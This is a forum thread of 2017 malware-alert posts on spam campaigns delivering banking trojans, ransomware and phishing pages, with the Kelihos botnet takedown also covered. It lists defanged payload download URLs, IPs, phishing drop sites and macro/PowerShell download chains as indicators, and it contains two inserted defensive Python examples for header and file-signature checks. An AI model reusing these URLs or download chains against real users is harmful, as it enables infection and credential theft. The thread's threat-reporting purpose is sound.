
SPAM frauds, fakes, and other MALWARE deliveries...



#1901 AplusWebMaster

Posted 04 April 2017 - 04:43 AM

FYI...

Fake 'Contract' SPAM - delivers trojan
- https://myonlinesecu...vering-malware/
4 Apr 2017 - "... malspam emails with password protected word doc attachments. They come with various subjects and themes, but they all contain -genuine- information about the recipient. Some like this one, only have the recipient's full name, address and email address but some also contain genuine phone numbers, either landline or mobile numbers. An email with the subject of '[recipients name] Contract EFKP030417GD' pretending to come from random senders with a malicious word doc attachment...

Screenshot: https://myonlinesecu...FKP030417GD.png

victim.EFKP030417GD.doc - eventually downloads Ursnif (virustotal 10/60*) see VT comments for full details...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://virustotal.c...sis/1491230132/
03EF8.exe

Ursnif: http://researchcente...rks-identified/
"... banking Trojan..."
___

Fake 'DHL Delivery' SPAM - delivers js malware
- https://myonlinesecu...livers-malware/
4 Apr 2017 - "... an email with the subject of 'DHL Delivery' coming or pretending to come from DHL Express UK. These do look very realistic and if you are expecting a delivery today (many recipients will be) you can be very easily fooled by it... from the various reports are connections to various well known websites and webmail services like Google, Facebook, Yahoo, Nirsoft .com and what looks like attempted logins. The javascript file is basically -obfuscated- by simply reversing the url strings embedded in the file, so for example these reverse encoded strings embedded in the js file...
/6863daolnwod/se.aicnelapnerarpmoc//:ptth
/7184daolnwod/moc.leuftnuocsidupe//:ptth
/4372daolnwod/moc.puorgcmc//:ptth
/4819daolnwod/ku.oc.nimdagcc.www//:ptth
/8522daolnwod/xm.moc.zenitramoderfla.www//:ptth
Transform to:
http ://www .alfredomartinez .com.mx/download2258/ : 162.144.80.161: https://www.virustot...61/information/
> https://www.virustot...67052/analysis/
http ://www .ccgadmin .co.uk/download9184/ : 193.238.80.70: https://www.virustot...70/information/
> https://www.virustot...15435/analysis/
http ://cmcgroup .com/download2734/ : 216.218.207.100: https://www.virustot...00/information/
> https://www.virustot...0798c/analysis/
http ://epudiscountfuel .com/download4817/ : 69.175.87.139: https://www.virustot...39/information/
> https://www.virustot...38783/analysis/
http ://comprarenpalencia .es/download3686/ : 149.202.107.130: https://www.virustot...30/information/
> https://www.virustot...dd5f9/analysis/
...

Screenshot: https://myonlinesecu...lspam-email.png

The link in the email goes to http ://atvicon .com/OXF31666g/ where you see an open directory. Selecting index.php gives you the download of the .js file (VirusTotal 12/56*). The payload Security report** of this .js file shows lots of other urls associated with this malware & downloads, some of which give an immediate download of the .js file. The Payload Security report shows a download of a file named 2tlj63ijo.exe (VirusTotal 28/61***) (Payload Security[4]) ... my -manual- download gave me (VirusTotal 8/62[5]) Payload Security[6] ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491300071/
DHL__Report__5238760711__Di__April__04__2017.js

** https://www.hybrid-a...e01b38374bbcce7
Contacted Hosts
216.218.207.100
87.106.105.76
67.205.128.122


*** https://www.virustot...76f92/analysis/
2tlj63ijo.exe

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
87.106.105.76
67.205.128.122


5] https://www.virustot...sis/1491300282/
5960.exe

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
87.106.105.76
67.205.128.122


atvicon .com: 67.222.136.31: https://www.virustot...31/information/
___

Fake 'Western Union' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
4 Apr 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... Unlike today’s slightly earlier Java Adwind malspam spoofing Bank of Bahamas*, this one does have a new Java Adwind version at the end of the complicated delivery chain...
* https://myonlinesecu...rs-java-adwind/

Screenshot: https://myonlinesecu...on-1_4_2017.png

These contain a genuine PDF that has a link to the site to download a zip file. First the pdf looks like:
> https://myonlinesecu...mtcn_wu_pdf.png
The link today goes to:
   http ://publikasi-fbio .ukdw .ac.id/css/WesternUnion_Fund_Verification_As_of_1st_April_2017.htm
where you see this page with instructions trying to make you think it is genuine with yet -another- download link:

   http ://publikasi-fbio .ukdw .ac.id/css/WesternUnion_Fund_Verification_As_of_1st_April_2017.zip

> https://myonlinesecu...ownloadpage.png

AWD020025 MTCN 25 Funds Verification.jar (478kb) Current Virus total detections 11/58*: MALWR**
details.jar (119kb) Current Virus total detections 5/55***: Payload Security[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491283408/
AWD020025 MTCN 25 Funds Verification.jar

** https://malwr.com/an...DQwYmE2NTFiOGU/

*** https://www.virustot...sis/1476250143/

4] https://www.hybrid-a...vironmentId=100

publikasi-fbio .ukdw .ac.id: 119.235.252.122: https://www.virustot...22/information/
> https://www.virustot...1f960/analysis/
___

'Quota Exceeded' - Phish
- https://myonlinesecu...d-now-phishing/
4 Apr 2017 - "... phishing attempts for email credentials...:

Screenshot: https://myonlinesecu...ase-Add-Now.png

If you follow the -link- inside-the-email you see a webpage looking like this:
  http ://maharajasweet .com/flash/bestdomain/?email=victim@domain.com :
> https://myonlinesecu...bmail_phish.png

... recognize familiar details like our email address or domain name... look at the -real- address in the URL bar at the top of the page:
> https://myonlinesecu...mail_phish2.png
After you input your email address and password, you get a 'success' page:
> https://myonlinesecu.../04/success.png

... whether it is a straight forward attempt, like this one, to -steal- your personal, bank, credit card or email and social networking log in details... the final IP address outside of your network in the Received: fields can be trusted as others can be -spoofed- ..."

maharajasweet .com: 209.200.238.28: https://www.virustot...28/information/
> https://www.virustot...05373/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 04 April 2017 - 09:06 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

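The 'Quota Exceeded' phish write-up above makes the point that only the final IP address outside your own network in the Received: fields can be trusted, because the sender controls every header below it. As an added example (not part of the original post), this Python helper walks a message's Received: chain newest-first, using the standard email module, until the first hop whose connecting address is outside the organisation's trusted networks, and reports the headers beneath it as unverified. The message and the 10.0.0.0/8 "trusted" range are constructed for the example.

```python
"""Find the last trustworthy hop in an e-mail's Received: chain (added example)."""
import ipaddress
import re
from email import message_from_string
from email.policy import default

# Bracketed literal address in the "from host (name [addr])" clause of a Received: header.
_BRACKETED_ADDR = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")


def connecting_addr(received_header):
    """Return the bracketed address of the connecting host, or None if absent/invalid."""
    m = _BRACKETED_ADDR.search(received_header)
    if not m:
        return None
    try:
        return ipaddress.ip_address(m.group(1))
    except ValueError:
        return None


def last_trusted_external_hop(raw_message, trusted_networks):
    """Walk Received: headers newest-first (each relay prepends its own).

    Returns (hop_index, ip_str, header_text) for the first hop whose connecting
    address lies outside trusted_networks, or None if every hop is internal."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    msg = message_from_string(raw_message, policy=default)
    for index, hdr in enumerate(msg.get_all("Received", [])):
        addr = connecting_addr(hdr)
        if addr is None:
            continue  # internal handoff without an address literal; keep walking
        if not any(addr in net for net in nets):
            return index, str(addr), str(hdr)
    return None


def untrusted_received_headers(raw_message, trusted_networks):
    """Received: headers below the last trusted hop; the sender could have forged these."""
    hop = last_trusted_external_hop(raw_message, trusted_networks)
    msg = message_from_string(raw_message, policy=default)
    headers = [str(h) for h in msg.get_all("Received", [])]
    return headers[hop[0] + 1:] if hop else headers


# Constructed sample: the bottom hop claims to come from paypal.com, but that header was
# written by the external relay, not by anything we control.
SAMPLE_MESSAGE = (
    "Received: from mx1.example-corp.test (mx1.example-corp.test [10.0.0.5])\n"
    "\tby mailstore.example-corp.test with ESMTP; Tue, 4 Apr 2017 09:00:00 +0000\n"
    "Received: from mail.relay.test (unknown [203.0.113.77])\n"
    "\tby mx1.example-corp.test with ESMTPS; Tue, 4 Apr 2017 08:59:58 +0000\n"
    "Received: from paypal.com (paypal.com [198.51.100.9])\n"
    "\tby mail.relay.test; Tue, 4 Apr 2017 08:59:50 +0000\n"
    "From: \"PayPal\" <service@paypal.example>\n"
    "Subject: Update acct info\n"
    "\n"
    "Please confirm your account details.\n"
)

if __name__ == "__main__":
    hop = last_trusted_external_hop(SAMPLE_MESSAGE, ["10.0.0.0/8"])
    print("last trusted external IP:", hop[1] if hop else "none found")
    for h in untrusted_received_headers(SAMPLE_MESSAGE, ["10.0.0.0/8"]):
        print("unverified:", h)
```
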
#1902 AplusWebMaster

Posted 06 April 2017 - 03:29 PM

FYI...

Malvertising on iOS - VPN app
- https://blog.malware...aising-vpn-app/
April 6, 2017 - "... we discovered this -scareware- campaign that pushes a ‘free’ VPN app called 'My Mobile Secure' to iOS users via rogue ads on popular Torrent sites. The page plays an ear-piercing beeping sound and claims your device is 'infected with viruses':
> https://blog.malware.../scareware_.png
... Apple has released an update to their mobile operating system (iOS 10.3.1*) to avoid so-called “browser lockers” via incessant JavaScript popups that prevented users from closing the offending page. Having said that, social engineering attacks such as the one above are still active and prey on the surprise effect or culpability someone may experience after browsing sites with pirated material:
* https://support.apple.com/HT207688
... According to their website, MobileXpression is a market research panel designed to 'understand the trends and behaviors of people using the mobile Internet'. This seems a bit peculiar when applied to a VPN product, whose goal is to precisely anonymize your online activity by encrypting your data from your ISP, government, bad guys, etc... Free does not mean Open Source or risk-free for that matter. But the fact of the matter is that people tend to gravitate towards free products, especially if those are pushed aggressively via hungry advertisers. For this reason, users should pay even more attention before installing a free app:
> https://blog.malware...04/privacy1.png
... data should never be collected in the first place because some very unfortunate things can happen once it is logged in a database. Haven’t there been enough data breaches lately to be seriously concerned with what kind of data a company may collect (inadvertently or not)? Choosing the right VPN application these days has become very challenging due to the renewed interest in online privacy (there are other reasons people buy VPNs as well, such as to bypass geo-restrictions from services like Netflix, the BBC, etc). It’s important to take the time to review the companies behind those products, their policies, and real reviews, not -fake- or sponsored ones. At the end of the day, you are placing your data and trust in someone else’s hands.
Kudos to CloudFlare for terminating the scareware domain in less than five minutes.
IOCs:
..."
 

:ninja: :ninja:   :grrr:



#1903 AplusWebMaster

Posted 07 April 2017 - 05:26 AM

FYI...

Fake 'Customer Statement' SPAM - delivers malware
- https://myonlinesecu...verers-malware/
7 Apr 2017 - "An email with the subject of  pretending to come from random companies with a zip file that extracts to another zip that eventually extracts to a malicious word doc attachment delivers malware, probably Dridex banking Trojan. Currently Payload Security has a massive backlog so analysis is pending...

Screenshot: https://myonlinesecu...r-statement.png

Statement_SE8743.docm - Current Virus total detections 8/58* MALWR**...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491553437/

** https://malwr.com/an...zc3MTg1MGM4NjQ/
Hosts
195.114.1.135
___

Fake '.JPG' SPAM - delivers Dridex
- https://myonlinesecu...elivers-dridex/
7 Apr 2017 - "... an email with a subject saying something like 'Emailing: PIC9744891.JPG' (random numbers and file extensions... Gif, JPG, Tiff, Png or any other image or doc file extension). They all come from random senders. The zip attachment extracts to another zip file that eventually extracts to the VBS dropper...

Screenshot: https://myonlinesecu...dex-malspam.png

PIC9390310.vbs - Current Virus total detections 5/56* - MALWR** shows a download of an encrypted file from
  http ://staciedunlop .com/87hcwc? which is converted by the script to KhtLPsv.exe (VirusTotal 14/61***)
Each VBS file has 4-or-5 embedded urls that download the encrypted text file that gets converted to the Dridex payload... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491567450/

** https://malwr.com/an...zRjNjhmYTJlOWQ/
Hosts
64.69.93.68

*** https://www.virustot...sis/1491568169/

staciedunlop .com: 64.69.93.68: https://www.virustot...68/information/
> https://www.virustot...3af59/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 07 April 2017 - 10:38 AM.


#1904 AplusWebMaster

Posted 08 April 2017 - 11:29 AM

FYI...

'Paypal Update acct info' – Phish
- https://myonlinesecu...h-a-difference/
8 Apr 2017 - "We see lots of phishing attempts for PayPal details. This one is slightly different than many others and much more involved and complicated. This one has an html -attachment- that contains the phishing acts... They ask you to give all the usual details... The whole HTML file is -encrypted- ...
Update: ... by numerous contacts on Twitter, eventually it has been discovered that

   http ://www.accunetix .net/80f78664.php  is the phishing drop site...

Screenshot: https://myonlinesecu...information.png

The html form looks like this (reduced in size to fit on one screenshot):
> https://myonlinesecu...-atatchment.png

...  Watch for -any- site that invites you to enter ANY personal or financial information..."

accunetix .net: 94.102.60.170: https://www.virustot...70/information/
> https://www.virustot...6c62d/analysis/
 

:ninja: :ninja:   :grrr:



#1905 AplusWebMaster

Posted 10 April 2017 - 04:24 AM

FYI...

Fake 'Scanned image' SPAM - delivers Cerber
- https://myonlinesecu...ber-ransomware/
10 Apr 2017 - "... An email with the subject of 'Scanned image from MX-2600N' pretending to come from noreply@ your own email address with a zip file attachment that extracts to another zip file then a malicious word doc delivers Cerber ransomware...

Screenshot: https://myonlinesecu...om-MX-2600N.png

20170410_294152.docm - Current Virus total detections 11/58*: Payload Security** shows a download of an encrypted txt file from http ://villa-kunterbunt-geseke .de/nkjv78v which is transformed by the macro script to redchip2.exe (VirusTotal 8/61***). Payload Security[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491816739/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
85.114.146.10

*** https://www.virustot...sis/1491816149/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17

villa-kunterbunt-geseke .de: 85.114.146.10: https://www.virustot...10/information/
> https://www.virustot...1ec24/analysis/
___

Fake 'scan data' SPAM - delivers Dridex
- https://myonlinesecu...eliver-malware/
10 Apr 2017 - "... an email with the subject of 'scan data' pretending to come from noreply@ your own email address...

Screenshot: https://myonlinesecu...ata-malspam.png

... several antiviruses on VirusTotal 8/56* declare this as 'a malicious PDF file'. PDF examiner** declares this 'a suspicious.embedded doc file' and 'suspicious.warning: object contains JavaScript' | Payload Security***...

ScanData155328.docm (VirusTotal 10/57[4]) (Payload Security [5]) | MALWR[6]. This contacts:
 super-marv .com/874hv... It looks like it should download an -encrypted- txt file that is converted to redchip2.exe... Update: this one is Dridex... An alternative pdf gave me Payload Security[7] which downloaded redchip2.exe from

 hiddencreek .comcastbiz .net/874hv (Virustotal 10/61[8])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491827466/
[See 'File detail']

** https://www.malwaret...2bfa06d241b8f27

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
143.95.251.11


4] https://www.virustot...sis/1491829510/
ScanData155328.docm

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
143.95.251.11


6] https://malwr.com/su...jU3NWQxMmRhM2Q/
Hosts
143.95.251.11

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
194.9.25.17
216.87.186.165
185.44.105.92
64.79.205.100
185.25.184.214


8] https://www.virustot...sis/1491828872/
redchip2.exe

hiddencreek .comcastbiz .net: 216.87.186.165: https://www.virustot...65/information/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 10 April 2017 - 10:03 AM.


#1906 AplusWebMaster

Posted 11 April 2017 - 05:53 AM

FYI...

Fake 'RBS' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
11 Apr 2017 - "An email with the subject of 'FW: Important BACs documents' pretending to come from RBS BACs <GRGBACspaymentsdelivery@ rbsdocuments .co.uk> with a malicious word doc spreadsheet attachment delivers malware... it appears to be Trickbot banking Trojan...

Screenshot: https://myonlinesecu...04/rbs_bacs.png

RBS_BACs_11042017.doc - Current Virus total detections 3/54*. Payload Security currently is not responding for me. MALWR** shows nothing relevant.
I am informed that it uses PowerShell to download http ://hitecmetal .com.my/images/NGVN4LNyaCV6amPf8jsgJeHVgLX.png which of course is -not- a png but a renamed .exe file (VirusTotal 11/60***) which even more suggests ursnif or Trickbot banking Trojans... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491904361/

** https://malwr.com/an...DQ0MzZhMjVhNTQ/

*** https://www.virustot...sis/1491905198/
kxecz.exe

hitecmetal .com.my: 110.4.45.192: https://www.virustot...92/information/
___

Fake 'scanned file' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
11 Apr 2017 - "... an email that has a multitude of subjects all along the line of 'scanned file/image document/image etc. pretending to come from totally random senders with a pdf attachment. This PDF does have an embedded word doc inside... Payload Security Hybrid Analysis... is currently down. I assume this will turn out to be Dridex in the same way it did yesterday*...
* https://myonlinesecu...eliver-malware/

Screenshot: https://myonlinesecu.../image-data.png

20170411414556.pdf - Current Virus total detections 10/57*. MALWR**...
Update: ... the word macro content shows downloads of -encrypted- txt files from:
medjobsmatch .com/kjv783r
outoftheboxpc .org/kjv783r
jenya.kossoy .com/kjv783r
Which MALWR*** managed to decode as redchip2.exe (VirusTotal 8/61[4]) which although not being detected as Dridex is either likely to be Dridex or Kegotip... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1491908876/

** https://malwr.com/an...jJlMjg1NmQ4Yjg/

*** https://malwr.com/an...jk1ZmM5MGZmZmU/
Hosts
23.229.143.7

4] https://www.virustot...sis/1491910444/

medjobsmatch .com: 23.229.143.7: https://www.virustot....7/information/

outoftheboxpc .org: 216.87.186.17: https://www.virustot...17/information/

jenya.kossoy .com: 64.111.126.118: https://www.virustot...18/information/
___

Fake Google Maps listings redirect Users to fraudulent sites
- https://www.bleeping...tes-each-month/
Apr 10, 2017 - "... This is the result of a study carried out by Google and University of California, San Diego researchers, who analyzed over 100,000 businesses marked as 'abusive' and added to Google Maps between June 2014 and September 2015. Researchers say that 74% of these abusive listings were for local businesses in the US and India, mainly in pockets around certain local hotspots, especially in large metropolitan areas such as New York, Chicago, Houston, or Los Angeles. In most cases, the scheme was simple. A customer in need of a locksmith or electrician would search Google Maps for a local company. If he navigated to the website of a fake business or called its number, a call center operator posing as the business' representative would send over an unaccredited contractor that would charge much more than regular professionals. If a customer's situation were urgent, the contractor would often charge more than the initial agreed upon price. Researchers said that 40.3% of all the listings for fake companies they found focused on on-call services, such as locksmiths, plumbers, and electricians, where customers were desperate to resolve issues... To list a business card on Google Maps, companies must go through a series of checks that involves Google mailing a postal card, or making a phone call to the business headquarters. After analyzing over 100,000 fake listings, researchers said miscreants registered post office boxes at UPS stores and used the same address to register tens to hundreds of listings per address. They did the same thing for their phone contact, by buying cheap VoIP numbers from providers such as Bandwidth .com, Level 3, Twilio, or Ring Central... The research team discovered that crooks managed to hijack 0.5% of Google Maps' outbound traffic for the studied period... Google also says it currently detects and disables around 85% fake listings before they ever appear on Google Maps..."
> https://static.googl...chive/45976.pdf
[ 9 pages ]
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 11 April 2017 - 09:10 AM.


#1907 AplusWebMaster

Posted 12 April 2017 - 05:19 AM

FYI...

Fake 'resume' SPAM - delivers malware
- https://myonlinesecu...ads-to-malware/
12 Apr 2017 - "An email with the subject of 'Greetings' comes from a random name and email address that says it is a resume applying for employment with a malicious word doc attachment delivers malware... Update: I am very reliably informed this is a Zyklon HTTP bot* which is being used in DDOS attacks against a wide variety of sites and is a password and other credential stealer, including all windows, office and many other software licencing keys, as well as email credentials, website passwords and any other password that you can think of...
* https://security.rad...on-http-botnet/

Screenshot: https://myonlinesecu...arah-resume.png

Sarah-Resume.doc - Current Virus total detections 7/57**. Payload Security*** shows a download using PowerShell from

 http ://185.165.29.36 /11.mov which is -renamed- by the macro to k4208.exe
(VirusTotal 7/61[4]) (Payload Security[5]) and autorun and in turn drops iTunes.exe and autorun
(VirusTotal 5/61[6]) (Payload Security[7])... The word doc has a slightly different instruction message than we usually see:
> https://myonlinesecu...tent-locked.png
This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run -will- infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
** https://www.virustot...sis/1491973686/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts

4] https://www.virustot...sis/1491963473/

5] https://www.hybrid-a...vironmentId=100
Contacted Hosts (20)

6] https://www.virustot...sis/1491963495/

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts (13)
___

Ransomware variants - emails
- https://isc.sans.edu...l?storyid=22290
2017-04-12 - "... malicious spam (malspam) on Tuesday morning 2017-04-11. At first, I thought it had limited distribution. Later I found several other examples, and they were distributing yet another ransomware variant... The ransomware is very aware of its environment, and I had to use a physical Windows host to see the infection activity...:
> https://isc.sans.edu...ry-image-01.jpg
... I collected 14 samples of the malspam on Tuesday 2017-04-11. It started as early as 14:12 UTC and continued through at least 17:03 UTC. Each email had a -different- subject line, a -different- sender, -different- message text, and a -different-link- to click:
> https://isc.sans.edu...ry-image-02.jpg
... -All- are subdomains of ideliverys .com on 47.91.88.133 port 80. The domain ideliverys .com was registered the-day-before on Monday 2017-04-10...
As usual, humans are the weakest link in this type of infection chain. If people are determined to bypass all warnings, and their systems are configured to allow it, they will become infected. Unfortunately, that's too often the case. I don't believe the situation will improve any time soon, so we can expect these types of malspam campaigns to continue..."
(More detail at the first ISC URL at the top.)

ideliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...f9d0f/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 12 April 2017 - 06:21 AM.


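The 'RBS' post above (#1906) notes a PowerShell download of a ".png" that is really a renamed .exe, and the 'resume' post (#1907) a ".mov" that the macro renames to an .exe. As an added example (not code from either post or from the linked write-ups), this Python helper sniffs a handful of well-known file signatures (PE, PNG, JPEG, GIF, PDF, ZIP/OOXML) and reports when a downloaded file's content disagrees with the extension it was given, which is the check a download filter or sandbox triage script should make instead of trusting the name. The signature table, allowed-extension map and sample blobs are all constructed for the example.

```python
"""Flag downloaded files whose leading bytes do not match their extension (added example)."""
import struct
from os.path import splitext

# (magic bytes, sniffed type) for formats the phishing posts mention; PE is handled separately.
_SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),  # also .docx/.docm/.xlsx/.jar, which are ZIP containers
]

# Which sniffed types are legitimate for a given claimed extension.
_ALLOWED = {
    ".png": {"png"}, ".jpg": {"jpeg"}, ".jpeg": {"jpeg"}, ".gif": {"gif"},
    ".pdf": {"pdf"}, ".zip": {"zip"}, ".docx": {"zip"}, ".docm": {"zip"},
    ".xlsx": {"zip"}, ".jar": {"zip"}, ".exe": {"pe"}, ".dll": {"pe"},
}


def is_pe(data):
    """True for a Windows PE image: 'MZ' DOS stub plus 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"  # empty slice if offset is bogus


def sniff(data):
    """Return the content type implied by the file's leading bytes, or 'unknown'."""
    if is_pe(data):
        return "pe"
    for magic, kind in _SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def check_download(filename, data):
    """Return (verdict, sniffed_type); verdict is 'ok', 'mismatch',
    'unknown-extension' (nothing to compare against) or 'unknown-content'."""
    kind = sniff(data)
    ext = splitext(filename)[1].lower()
    if ext not in _ALLOWED:
        return "unknown-extension", kind
    if kind == "unknown":
        return "unknown-content", kind
    return ("ok" if kind in _ALLOWED[ext] else "mismatch"), kind


def fake_pe():
    """Constructed minimal PE-looking blob: MZ stub, e_lfanew = 0x40, 'PE\\0\\0' at 0x40."""
    stub = bytearray(0x40)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)
    return bytes(stub) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    samples = [
        ("image-from-campaign.png", fake_pe()),                      # renamed executable
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),            # genuine PNG header
        ("Statement.docm", b"PK\x03\x04" + b"\x00" * 30),              # OOXML (ZIP) container
    ]
    for name, blob in samples:
        print(name, check_download(name, blob))
```
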
#1908 AplusWebMaster

Posted 13 April 2017 - 04:07 AM

FYI...

Fake 'USPS, UPS, DHL, FEDEX' SPAM - delivers mole ransomware
- https://myonlinesecu...ole-ransomware/
12 Apr 2017 - "... USPS, UPS, DHL, FEDEX and all the other delivery companies being spoofed and emails pretending to be from them delivering all sorts of malware, usually via zip attachments containing JavaScript files. I saw this post on Sans Security blog*... and expected that I would soon see them...they started to flood in today.
* https://isc.sans.edu...l?storyid=22290
There are a multitude of different subjects. Some of the ones I received today are:
'    Official notice regarding your order
    IMPORTANT USPS MONEYBACK INFO IN REGARDS TO YOUR PARCEL
    AUTOMATED notice in regards to your parcel’s status
    WARNING: INFO ABOUT A LATEST REFUND '

These subjects today are different to the unusual subjects we see listed in the sans blog post.
Typical senders -imitating- USPS include:
    USPS Delivery <huo4@ doverealty .net>
    USPS Express Delivery <ooyyomq57575452@ avensonline .org>
    USPS Priority Parcels <rejunwuj75324281@ vki-interiors .com>
    USPS Ground Support <heyluogf13136286@ parcerianet .com.br> ...
... these -all- use various subdomains of ideliverys .com... you see what looks like a word online website and you are invited to download the latest 'plugin' version to read the documents online:
> https://myonlinesecu...line-plugin.png

plugin.exe - Current Virus total detections 29/60**. Payload Security***.. I assume this is the same mole ransomware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
** https://www.virustot...47b11/analysis/

*** https://www.hybrid-a...vironmentId=100

ideliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...f9d0f/analysis/

- https://myonlinesecu...vering-malware/
13 Apr 2017 - "... USPS, UPS, DHL, FEDEX SPAM... a -hybrid- campaign mixing elements of all the previous campaigns...

Screenshot: https://myonlinesecu...REFUND-INFO.png

... These all use various subdomains of maildeliverys .com to divert to
 http ://tramplinonline .ru/counter/1.htm  where you see what looks like a word online website and you are invited to download the -latest- 'plugin' version to read the documents online:
> https://myonlinesecu..._trampoline.png
... this is where the hybrid element comes into play. Once you press download, you get a zip file plugin.zip which extracts to plugin.js ... starts with the first site in the array (var ll) and then downloads these (if the first site cannot be contacted or the file is missing) it moves on to next site and so on, eventually giving -3- malware files.
/counter/exe1.exe (mole ransomware) VirusTotal 6/62[1]
/counter/exe2.exe  delivers kovter/powerliks VirusTotal 7/62[2]
/counter/exe3.exe  VirusTotal 0/61[3] | VirusTotal 3/62[4] (first one possibly corrupt)
Today’s sites are:
forum-turism .org.ro/images/layout
boorsemsport .be/templates/yoo_aurora/less/uikit
eurostandard .ro/pics/size1
alita .kz/tmp/installation/language/cs-CZ
sportbelijning .be/libraries/joomla/application/web
tramplinonline .ru
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1492102514/

2] https://www.virustot...sis/1492110707/

3] https://www.virustot...sis/1492110713/

4] https://www.virustot...sis/1492109005/

maildeliverys .com: 47.91.88.133: https://www.virustot...33/information/
> https://www.virustot...6b637/analysis/

tramplinonline .ru: 92.242.42.146: https://www.virustot...46/information/
> https://www.virustot...f991e/analysis/
___

Kelihos.E Botnet – Takedown
- http://blog.shadowse...4/12/kelihos-e/
April 12, 2017 - "On Monday April 10th 2017, the US Department of Justice (DOJ) announced* a successful operation to take down the Kelihos Botnet and arrest the suspected botnet operator. The Kelihos botnet (and its predecessor Waledec) was one of the most active spamming botnets. Earlier versions of the malware were also involved in delivering trojan horses, stealing user credentials and crypto currency wallets, and in crypto currency mining. The Kelihos botnet was made up of a network of tens of thousands of infected Windows hosts worldwide. It used its own peer-to-peer (P2P) protocol, along with backup DNS domains, to provide resilient command and control (C2) facilities... The Kelihos.E botnet takedown occurred on Friday April 8th 2017, with 100% of the peer-to-peer network being successfully taken over by law enforcement and C2 traffic redirected to our sinkholes, C2 backend server infrastructure being seized/disrupted, as well as multiple fallback DNS domains being successfully sinkholed under US court order..."
* https://www.justice....elihos-botnet-0
April 10, 2017 - "The Justice Department today announced an extensive effort to disrupt and dismantle the Kelihos botnet – a global network of tens of thousands of infected computers under the control of a cybercriminal that was used to facilitate malicious activities including harvesting login credentials, distributing hundreds of millions of spam e-mails, and installing ransomware and other malicious software..."
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 13 April 2017 - 03:56 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1909 AplusWebMaster


Posted 14 April 2017 - 05:12 AM

FYI...

Fake 'MONEY GRAM' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
14 Apr 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... Slight change to previous examples today where these are being addressed to tamuna.khaduri@ basisbank .ge or mdzirkvelishvili@ tbcbank .com.ge ... looks like random names @ random bank.ge  and BCC to the actual recipient... coming via compromised accounts on Godaddy...

Screenshot: https://myonlinesecu...ONFIRMATION.png

URGENT MONEYGRAM CONFIRMATION.jar (479kb) - Current Virus total detections 19/59*. MALWR** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492148381/

** https://malwr.com/an...WMyNTc3NGYyYTI/
 


#1910 AplusWebMaster


Posted 15 April 2017 - 09:33 AM

FYI...

DropBox – Phish
- https://myonlinesecu...opbox-phishing/
15 Apr 2017 - "... phishing attempts for email credentials...

Screenshot: https://myonlinesecu...phish-email.png

If you follow the -link- you see a webpage looking like this:
 http ://magioangeles .com/mo/DropBoxPhoto/
> https://myonlinesecu...opbox-phish.png

